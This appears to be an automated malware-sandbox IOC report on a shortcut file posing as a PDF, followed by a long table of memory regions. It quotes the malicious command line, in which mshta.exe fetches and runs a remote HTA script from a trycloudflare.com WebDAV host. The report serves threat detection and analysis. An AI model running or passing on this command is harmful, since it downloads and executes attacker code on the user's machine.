IOC Report
RE_005859358438475.pdf.lnk.download.lnk

loading gifProcessesMemdumps1020102Label

Processes

Path
Cmdline
Malicious
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "\\optical-bright-fonts-zealand.trycloudflare.com@SSL\DavWWWRoot\raye.hta"
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
1CA55FED000
heap
page read and write
1D257EE4000
trusted library allocation
page read and write
1CA561B0000
trusted library allocation
page read and write
1D257F50000
trusted library allocation
page read and write
1CA5622D000
heap
page read and write
1D257ECC000
trusted library allocation
page read and write
1D257EF0000
trusted library allocation
page read and write
91F26F9000
stack
page read and write
1D257F00000
trusted library allocation
page read and write
1D257EBC000
trusted library allocation
page read and write
1D257F60000
trusted library allocation
page read and write
1CA56224000
heap
page read and write
1D257DB4000
heap
page read and write
1D257F20000
trusted library allocation
page read and write
1D257EE8000
trusted library allocation
page read and write
1CA56024000
heap
page read and write
1D257F38000
trusted library allocation
page read and write
91F2D4F000
stack
page read and write
1D257ED4000
trusted library allocation
page read and write
1D257EC0000
trusted library allocation
page read and write
1D258190000
heap
page read and write
1CA55F50000
heap
page read and write
1CA561F0000
heap
page read and write
91F2A4E000
stack
page read and write
1D257F04000
trusted library allocation
page read and write
1D257F30000
trusted library allocation
page read and write
1D257FF0000
heap
page read and write
91F294E000
stack
page read and write
1CA5600D000
heap
page read and write
91F2C4D000
stack
page read and write
1D257F18000
trusted library allocation
page read and write
1CA55FB9000
heap
page read and write
1CA56220000
heap
page read and write
1D257F3C000
trusted library allocation
page read and write
91F2B4F000
stack
page read and write
1D257F58000
trusted library allocation
page read and write
1D257F68000
trusted library allocation
page read and write
1D257EE0000
trusted library allocation
page read and write
1D257EB8000
trusted library allocation
page read and write
1D2582A0000
trusted library allocation
page read and write
1CA55F80000
heap
page read and write
1D257F09000
trusted library allocation
page read and write
1D257F10000
trusted library allocation
page read and write
1D257ED0000
trusted library allocation
page read and write
1D257DB0000
heap
page read and write
1CA55FB0000
heap
page read and write
1D257F48000
trusted library allocation
page read and write
1D258AB4000
heap
page read and write
1CA55F60000
heap
page read and write
1D257DC9000
heap
page read and write
1D257EFC000
trusted library allocation
page read and write
91F2F4F000
stack
page read and write
1CA562C5000
heap
page read and write
1D258194000
heap
page read and write
1D257F28000
trusted library allocation
page read and write
1D257EF4000
trusted library allocation
page read and write
1D258AA0000
heap
page read and write
1CA562CD000
heap
page read and write
1D257EF8000
trusted library allocation
page read and write
1CA55FD6000
heap
page read and write
1D257DCE000
heap
page read and write
1D257EDC000
trusted library allocation
page read and write
1D257EC8000
trusted library allocation
page read and write
1D257F54000
trusted library allocation
page read and write
1CA562C0000
heap
page read and write
There are 55 hidden memdumps, click here to show them.